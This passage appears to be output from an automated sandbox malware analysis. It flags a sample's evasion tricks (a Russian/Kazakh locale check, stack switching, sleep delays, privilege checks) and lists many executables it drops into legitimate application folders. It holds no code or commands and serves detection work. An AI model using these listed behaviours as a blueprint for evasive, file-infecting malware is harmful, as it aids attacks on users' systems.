                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to behave differently if execute on a Russian/Kazak computer
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 6_2_009952A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_022852A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006B52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_006B52A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_008C52A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_007252A0
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeAPI/Special instruction interceptor: Address: A87C1C
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeAPI/Special instruction interceptor: Address: D3807C
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeAPI/Special instruction interceptor: Address: CE8244
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-110856
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\msdtc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 4.8 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.2 %
                  Source: C:\Windows\System32\alg.exe TID: 7460Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\alg.exe TID: 7444Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msdtc.exe TID: 7188Thread sleep count: 75 > 30
                  Source: C:\Windows\System32\alg.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0046445A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C6D1 FindFirstFileW,FindClose,1_2_0046C6D1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0046C75C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046EF95
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046F0F2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046F3F3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_004637EF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00463B12
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046BCBC
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_004049A0
                  Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
